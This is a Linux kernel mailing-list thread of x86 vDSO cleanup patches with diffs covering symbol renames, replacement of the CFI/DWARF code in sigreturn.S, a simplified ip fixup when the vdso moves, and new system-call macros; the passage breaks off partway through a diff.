3 files changed, 39 insertions(+), 114 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 965900c6763b..25b0ac4b4bfe 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -1,136 +1,54 @@
/* SPDX-License-Identifier: GPL-2.0 */
#include <linux/linkage.h>
#include <asm/unistd_32.h>
+#include <asm/dwarf2.h>
#include <asm/asm-offsets.h>
+.macro STARTPROC_SIGNAL_FRAME sc
+ CFI_STARTPROC simple
+ CFI_SIGNAL_FRAME
+ /* -4 as pretcode has already been popped */
+ CFI_DEF_CFA esp, \sc - 4
+ CFI_OFFSET eip, IA32_SIGCONTEXT_ip
+ CFI_OFFSET eax, IA32_SIGCONTEXT_ax
+ CFI_OFFSET ebx, IA32_SIGCONTEXT_bx
+ CFI_OFFSET ecx, IA32_SIGCONTEXT_cx
+ CFI_OFFSET edx, IA32_SIGCONTEXT_dx
+ CFI_OFFSET esp, IA32_SIGCONTEXT_sp
+ CFI_OFFSET ebp, IA32_SIGCONTEXT_bp
+ CFI_OFFSET esi, IA32_SIGCONTEXT_si
+ CFI_OFFSET edi, IA32_SIGCONTEXT_di
+ CFI_OFFSET es, IA32_SIGCONTEXT_es
+ CFI_OFFSET cs, IA32_SIGCONTEXT_cs
+ CFI_OFFSET ss, IA32_SIGCONTEXT_ss
+ CFI_OFFSET ds, IA32_SIGCONTEXT_ds
+ CFI_OFFSET eflags, IA32_SIGCONTEXT_flags
+.endm
+
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
- nop /* this guy is needed for .LSTARTFDEDLSI1 below (watch for HACK) */
ALIGN
__kernel_sigreturn:
-.LSTART_sigreturn:
- popl %eax /* XXX does this mean it needs unwind info? */
+ STARTPROC_SIGNAL_FRAME IA32_SIGFRAME_sigcontext
+ popl %eax
+ CFI_ADJUST_CFA_OFFSET -4
movl $__NR_sigreturn, %eax
int $0x80
-.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_sigreturn,.-.LSTART_sigreturn
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_sigreturn,.-__kernel_sigreturn
.globl __kernel_rt_sigreturn
.type __kernel_rt_sigreturn,@function
ALIGN
__kernel_rt_sigreturn:
-.LSTART_rt_sigreturn:
+ STARTPROC_SIGNAL_FRAME IA32_RT_SIGFRAME_sigcontext
movl $__NR_rt_sigreturn, %eax
int $0x80
-.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_rt_sigreturn,.-.LSTART_rt_sigreturn
- .previous
-
- .section .eh_frame,"a",@progbits
-.LSTARTFRAMEDLSI1:
- .long .LENDCIEDLSI1-.LSTARTCIEDLSI1
-.LSTARTCIEDLSI1:
- .long 0 /* CIE ID */
- .byte 1 /* Version number */
- .string "zRS" /* NUL-terminated augmentation string */
- .uleb128 1 /* Code alignment factor */
- .sleb128 -4 /* Data alignment factor */
- .byte 8 /* Return address register column */
- .uleb128 1 /* Augmentation value length */
- .byte 0x1b /* DW_EH_PE_pcrel|DW_EH_PE_sdata4. */
- .byte 0 /* DW_CFA_nop */
- .align 4
-.LENDCIEDLSI1:
- .long .LENDFDEDLSI1-.LSTARTFDEDLSI1 /* Length FDE */
-.LSTARTFDEDLSI1:
- .long .LSTARTFDEDLSI1-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: The dwarf2 unwind routines will subtract 1 from the
- return address to get an address in the middle of the
- presumed call instruction. Since we didn't get here via
- a call, we need to include the nop before the real start
- to make up for it. */
- .long .LSTART_sigreturn-1-. /* PC-relative start address */
- .long .LEND_sigreturn-.LSTART_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- complicated by the fact that the "CFA" is always assumed to
- be the value of the stack pointer in the caller. This means
- that we must define the CFA of this body of code to be the
- saved value of the stack pointer in the sigcontext. Which
- also means that there is no fixed relation to the other
- saved registers, which means that we must use DW_CFA_expression
- to compute their addresses. It also means that when we
- adjust the stack with the popl, we have to do it all over again. */
-
-#define do_cfa_expr(offset) \
- .byte 0x0f; /* DW_CFA_def_cfa_expression */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
- .byte 0x06; /* DW_OP_deref */ \
-1:
-
-#define do_expr(regno, offset) \
- .byte 0x10; /* DW_CFA_expression */ \
- .uleb128 regno; /* regno */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
-1:
-
- do_cfa_expr(IA32_SIGCONTEXT_sp+4)
- do_expr(0, IA32_SIGCONTEXT_ax+4)
- do_expr(1, IA32_SIGCONTEXT_cx+4)
- do_expr(2, IA32_SIGCONTEXT_dx+4)
- do_expr(3, IA32_SIGCONTEXT_bx+4)
- do_expr(5, IA32_SIGCONTEXT_bp+4)
- do_expr(6, IA32_SIGCONTEXT_si+4)
- do_expr(7, IA32_SIGCONTEXT_di+4)
- do_expr(8, IA32_SIGCONTEXT_ip+4)
-
- .byte 0x42 /* DW_CFA_advance_loc 2 -- nop; popl eax. */
-
- do_cfa_expr(IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_SIGCONTEXT_si)
- do_expr(7, IA32_SIGCONTEXT_di)
- do_expr(8, IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI1:
-
- .long .LENDFDEDLSI2-.LSTARTFDEDLSI2 /* Length FDE */
-.LSTARTFDEDLSI2:
- .long .LSTARTFDEDLSI2-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: See above wrt unwind library assumptions. */
- .long .LSTART_rt_sigreturn-1-. /* PC-relative start address */
- .long .LEND_rt_sigreturn-.LSTART_rt_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- slightly less complicated than the above, since we don't
- modify the stack pointer in the process. */
-
- do_cfa_expr(IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_si)
- do_expr(7, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_di)
- do_expr(8, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI2:
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_rt_sigreturn,.-__kernel_rt_sigreturn
.previous
diff --git a/arch/x86/include/asm/dwarf2.h b/arch/x86/include/asm/dwarf2.h
index 302e11b15da8..09c9684d3ad6 100644
--- a/arch/x86/include/asm/dwarf2.h
+++ b/arch/x86/include/asm/dwarf2.h
@@ -20,6 +20,7 @@
#define CFI_RESTORE_STATE .cfi_restore_state
#define CFI_UNDEFINED .cfi_undefined
#define CFI_ESCAPE .cfi_escape
+#define CFI_SIGNAL_FRAME .cfi_signal_frame
#ifndef BUILD_VDSO
/*
diff --git a/arch/x86/kernel/asm-offsets.c b/arch/x86/kernel/asm-offsets.c
index 25fcde525c68..081816888f7a 100644
--- a/arch/x86/kernel/asm-offsets.c
+++ b/arch/x86/kernel/asm-offsets.c
@@ -63,8 +63,14 @@ static void __used common(void)
OFFSET(IA32_SIGCONTEXT_bp, sigcontext_32, bp);
OFFSET(IA32_SIGCONTEXT_sp, sigcontext_32, sp);
OFFSET(IA32_SIGCONTEXT_ip, sigcontext_32, ip);
+ OFFSET(IA32_SIGCONTEXT_es, sigcontext_32, es);
+ OFFSET(IA32_SIGCONTEXT_cs, sigcontext_32, cs);
+ OFFSET(IA32_SIGCONTEXT_ss, sigcontext_32, ss);
+ OFFSET(IA32_SIGCONTEXT_ds, sigcontext_32, ds);
+ OFFSET(IA32_SIGCONTEXT_flags, sigcontext_32, flags);
BLANK();
+ OFFSET(IA32_SIGFRAME_sigcontext, sigframe_ia32, sc);
OFFSET(IA32_RT_SIGFRAME_sigcontext, rt_sigframe_ia32, uc.uc_mcontext);
#endif
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:00 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
The vdso .so files are named vdso*.so. These structures are binary
images and descriptions of those files, so it is more consistent for
them to have names that directly mirror the filenames.
It is also very slightly more compact (by one character...) and
simplifies the Makefile just a little bit.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 ++++-------
arch/x86/entry/vdso/Makefile | 8 ++++----
arch/x86/entry/vdso/vma.c | 10 +++++-----
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +++---
arch/x86/kernel/process_64.c | 6 +++---
arch/x86/kernel/signal_32.c | 4 ++--
8 files changed, 23 insertions(+), 26 deletions(-)
diff --git a/arch/x86/entry/syscall_32.c b/arch/x86/entry/syscall_32.c
index a67a644d0cfe..8e829575e12f 100644
--- a/arch/x86/entry/syscall_32.c
+++ b/arch/x86/entry/syscall_32.c
@@ -319,7 +319,7 @@ __visible noinstr bool do_fast_syscall_32(struct pt_regs *regs)
* convention. Adjust regs so it looks like we entered using int80.
*/
unsigned long landing_pad = (unsigned long)current->mm->context.vdso +
- vdso_image_32.sym_int80_landing_pad;
+ vdso32_image.sym_int80_landing_pad;
/*
* SYSENTER loses EIP, and even SYSCALL32 needs us to skip forward
diff --git a/arch/x86/entry/vdso/.gitignore b/arch/x86/entry/vdso/.gitignore
index 37a6129d597b..eb60859dbcbf 100644
--- a/arch/x86/entry/vdso/.gitignore
+++ b/arch/x86/entry/vdso/.gitignore
@@ -1,8 +1,5 @@
# SPDX-License-Identifier: GPL-2.0-only
-vdso.lds
-vdsox32.lds
-vdso32-syscall-syms.lds
-vdso32-sysenter-syms.lds
-vdso32-int80-syms.lds
-vdso-image-*.c
-vdso2c
+*.lds
+*.so
+*.so.dbg
+vdso*-image.c
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index f247f5f5cb44..7f833026d5b2 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -16,9 +16,9 @@ vobjs-$(CONFIG_X86_SGX) += vsgx.o
obj-y += vma.o extable.o
# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso-image-64.o
-obj-$(CONFIG_X86_X32_ABI) += vdso-image-x32.o
-obj-$(CONFIG_COMPAT_32) += vdso-image-32.o vdso32-setup.o
+obj-$(CONFIG_X86_64) += vdso64-image.o
+obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
+obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
vobjs := $(addprefix $(obj)/, $(vobjs-y))
vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
@@ -44,7 +44,7 @@ hostprogs += vdso2c
quiet_cmd_vdso2c = VDSO2C $@
cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
-$(obj)/vdso-image-%.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index afe105b2f907..8f98c2d7c7a9 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,7 +65,7 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
struct pt_regs *regs = current_pt_regs();
unsigned long vdso_land = image->sym_int80_landing_pad;
unsigned long old_land_addr = vdso_land +
@@ -230,7 +230,7 @@ static int load_vdso32(void)
if (vdso32_enabled != 1) /* Other values all mean "disabled" */
return 0;
- return map_vdso(&vdso_image_32, 0);
+ return map_vdso(&vdso32_image, 0);
}
int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
@@ -239,7 +239,7 @@ int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_64, 0);
+ return map_vdso(&vdso64_image, 0);
}
return load_vdso32();
@@ -252,7 +252,7 @@ int compat_arch_setup_additional_pages(struct linux_binprm *bprm,
if (IS_ENABLED(CONFIG_X86_X32_ABI) && x32) {
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_x32, 0);
+ return map_vdso(&vdsox32_image, 0);
}
if (IS_ENABLED(CONFIG_IA32_EMULATION))
@@ -267,7 +267,7 @@ bool arch_syscall_is_vdso_sigreturn(struct pt_regs *regs)
const struct vdso_image *image = current->mm->context.vdso_image;
unsigned long vdso = (unsigned long) current->mm->context.vdso;
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
if (regs->ip == vdso + image->sym_vdso32_sigreturn_landing_pad ||
regs->ip == vdso + image->sym_vdso32_rt_sigreturn_landing_pad)
return true;
diff --git a/arch/x86/include/asm/elf.h b/arch/x86/include/asm/elf.h
index 6c8fdc96be7e..2ba5f166e58f 100644
--- a/arch/x86/include/asm/elf.h
+++ b/arch/x86/include/asm/elf.h
@@ -361,7 +361,7 @@ else if (IS_ENABLED(CONFIG_IA32_EMULATION)) \
#define VDSO_ENTRY \
((unsigned long)current->mm->context.vdso + \
- vdso_image_32.sym___kernel_vsyscall)
+ vdso32_image.sym___kernel_vsyscall)
struct linux_binprm;
diff --git a/arch/x86/include/asm/vdso.h b/arch/x86/include/asm/vdso.h
index b7253ef3205a..e8afbe9faa5b 100644
--- a/arch/x86/include/asm/vdso.h
+++ b/arch/x86/include/asm/vdso.h
@@ -27,9 +27,9 @@ struct vdso_image {
long sym_vdso32_rt_sigreturn_landing_pad;
};
-extern const struct vdso_image vdso_image_64;
-extern const struct vdso_image vdso_image_x32;
-extern const struct vdso_image vdso_image_32;
+extern const struct vdso_image vdso64_image;
+extern const struct vdso_image vdsox32_image;
+extern const struct vdso_image vdso32_image;
extern int __init init_vdso_image(const struct vdso_image *image);
diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
index 432c0a004c60..08e72f429870 100644
--- a/arch/x86/kernel/process_64.c
+++ b/arch/x86/kernel/process_64.c
@@ -941,14 +941,14 @@ long do_arch_prctl_64(struct task_struct *task, int option, unsigned long arg2)
#ifdef CONFIG_CHECKPOINT_RESTORE
# ifdef CONFIG_X86_X32_ABI
case ARCH_MAP_VDSO_X32:
- return prctl_map_vdso(&vdso_image_x32, arg2);
+ return prctl_map_vdso(&vdsox32_image, arg2);
# endif
# ifdef CONFIG_IA32_EMULATION
case ARCH_MAP_VDSO_32:
- return prctl_map_vdso(&vdso_image_32, arg2);
+ return prctl_map_vdso(&vdso32_image, arg2);
# endif
case ARCH_MAP_VDSO_64:
- return prctl_map_vdso(&vdso_image_64, arg2);
+ return prctl_map_vdso(&vdso64_image, arg2);
#endif
#ifdef CONFIG_ADDRESS_MASKING
case ARCH_GET_UNTAG_MASK:
diff --git a/arch/x86/kernel/signal_32.c b/arch/x86/kernel/signal_32.c
index 42bbc42bd350..e55cf19e68fe 100644
--- a/arch/x86/kernel/signal_32.c
+++ b/arch/x86/kernel/signal_32.c
@@ -282,7 +282,7 @@ int ia32_setup_frame(struct ksignal *ksig, struct pt_regs *regs)
/* Return stub is in 32bit vsyscall page */
if (current->mm->context.vdso)
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_sigreturn;
+ vdso32_image.sym___kernel_sigreturn;
else
restorer = &frame->retcode;
}
@@ -368,7 +368,7 @@ int ia32_setup_rt_frame(struct ksignal *ksig, struct pt_regs *regs)
restorer = ksig->ka.sa.sa_restorer;
else
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_rt_sigreturn;
+ vdso32_image.sym___kernel_rt_sigreturn;
unsafe_put_user(ptr_to_compat(restorer), &frame->pretcode, Efault);
/*
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:55 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
There is no fundamental reason to use the int80_landing_pad symbol to
adjust ip when moving the vdso. If ip falls within the vdso, and the
vdso is moved, we should change the ip accordingly, regardless of mode
or location within the vdso. This *currently* can only happen on 32
bits, but there isn't any reason not to do so generically.
Note that if this is ever possible from a vdso-internal call, then the
user space stack will also need to be adjusted (as well as the
shadow stack, if enabled). Fortunately, this is not currently the case.
At the moment, we don't even consider other threads when moving the
vdso. The assumption is that it is only used by process freeze/thaw
for migration, where this is not an issue.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vma.c | 16 ++++++----------
1 file changed, 6 insertions(+), 10 deletions(-)
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index 8f98c2d7c7a9..e7fd7517370f 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,16 +65,12 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso32_image) {
- struct pt_regs *regs = current_pt_regs();
- unsigned long vdso_land = image->sym_int80_landing_pad;
- unsigned long old_land_addr = vdso_land +
- (unsigned long)current->mm->context.vdso;
-
- /* Fixing userspace landing - look at do_fast_syscall_32 */
- if (regs->ip == old_land_addr)
- regs->ip = new_vma->vm_start + vdso_land;
- }
+ struct pt_regs *regs = current_pt_regs();
+ unsigned long ipoffset = regs->ip -
+ (unsigned long)current->mm->context.vdso;
+
+ if (ipoffset < image->size)
+ regs->ip = new_vma->vm_start + ipoffset;
}
static int vdso_mremap(const struct vm_special_mapping *sm,
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:58 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
When neither sysenter32 nor syscall32 is available (on either
FRED-capable 64-bit hardware or old 32-bit hardware), there is no
reason to do a bunch of stack shuffling in __kernel_vsyscall.
Unfortunately, just overwriting the initial "push" instructions will
mess up the CFI annotations, so we suffer the 3-byte NOP when it is
not applicable.
Similarly, inline the int $0x80 when doing inline system calls in the
vdso instead of calling __kernel_vsyscall.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/system_call.S | 18 ++++++++++++++----
arch/x86/include/asm/vdso/sys_call.h | 4 +++-
2 files changed, 17 insertions(+), 5 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 7b1c0f16e511..9157cf9c5749 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -14,6 +14,18 @@
ALIGN
__kernel_vsyscall:
CFI_STARTPROC
+
+ /*
+ * If using int $0x80, there is no reason to muck about with the
+ * stack here. Unfortunately just overwriting the push instructions
+ * would mess up the CFI annotations, but it is only a 3-byte
+ * NOP in that case. This could be avoided by patching the
+	 * vdso symbol table (not the code) and entry point, which
+	 * would require a fair bit of tooling work, or by simply
+	 * compiling two different vDSO images; neither seems worth it.
+ */
+ ALTERNATIVE "int $0x80; ret", "", X86_FEATURE_SYSFAST32
+
/*
* Reshuffle regs so that all of any of the entry instructions
* will preserve enough state.
@@ -52,11 +64,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
- /* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
+ ALTERNATIVE SYSENTER_SEQUENCE, SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
- /* Enter using int $0x80 */
+ /* Re-enter using int $0x80 */
int $0x80
SYM_INNER_LABEL(int80_landing_pad, SYM_L_GLOBAL)
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
index dcfd17c6dd57..5806b1cd6aef 100644
--- a/arch/x86/include/asm/vdso/sys_call.h
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -20,7 +20,9 @@
# define __sys_reg4 "r10"
# define __sys_reg5 "r8"
#else
-# define __sys_instr "call __kernel_vsyscall"
+# define __sys_instr ALTERNATIVE("ds;ds;ds;int $0x80", \
+ "call __kernel_vsyscall", \
+ X86_FEATURE_SYSFAST32)
# define __sys_clobber "memory"
# define __sys_nr(x,y) __NR_ ## x ## y
# define __sys_reg1 "ebx"
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:04 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
Abstract out the calling of true system calls from the vdso into
macros.
It has been a very long time since gcc did not allow %ebx or %ebp in
inline asm in 32-bit PIC mode; remove the corresponding hacks.
Remove the use of memory output constraints in gettimeofday.h in favor
of "memory" clobbers. The resulting code is identical for the current
use cases, as the system call is usually a terminal fallback anyway,
and it merely complicates the macroization.
This patch adds only a handful more lines of code than it removes, and
in fact could be made substantially smaller by removing the macros for
the argument counts that aren't currently used; however, it seems
better to be general from the start.
[ v3: remove stray comment from prototyping; remove VDSO_SYSCALL6()
since it would require special handling on 32 bits and is
currently unused. (Uros Bizjak)
Indent nested preprocessor directives. ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/include/asm/vdso/gettimeofday.h | 108 ++---------------------
arch/x86/include/asm/vdso/sys_call.h | 103 +++++++++++++++++++++
2 files changed, 111 insertions(+), 100 deletions(-)
create mode 100644 arch/x86/include/asm/vdso/sys_call.h
diff --git a/arch/x86/include/asm/vdso/gettimeofday.h b/arch/x86/include/asm/vdso/gettimeofday.h
index 73b2e7ee8f0f..3cf214cc4a75 100644
--- a/arch/x86/include/asm/vdso/gettimeofday.h
+++ b/arch/x86/include/asm/vdso/gettimeofday.h
@@ -18,6 +18,7 @@
#include <asm/msr.h>
#include <asm/pvclock.h>
#include <clocksource/hyperv_timer.h>
+#include <asm/vdso/sys_call.h>
#define VDSO_HAS_TIME 1
@@ -53,130 +54,37 @@ extern struct ms_hyperv_tsc_page hvclock_page
__attribute__((visibility("hidden")));
#endif
-#ifndef BUILD_VDSO32
-
static __always_inline
long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_gettime), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,64,_clkid,_ts);
}
static __always_inline
long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
struct timezone *_tz)
{
- long ret;
-
- asm("syscall" : "=a" (ret) :
- "0" (__NR_gettimeofday), "D" (_tv), "S" (_tz) : "memory");
-
- return ret;
+ return VDSO_SYSCALL2(gettimeofday,,_tv,_tz);
}
static __always_inline
long clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_getres), "D" (_clkid), "S" (_ts) :
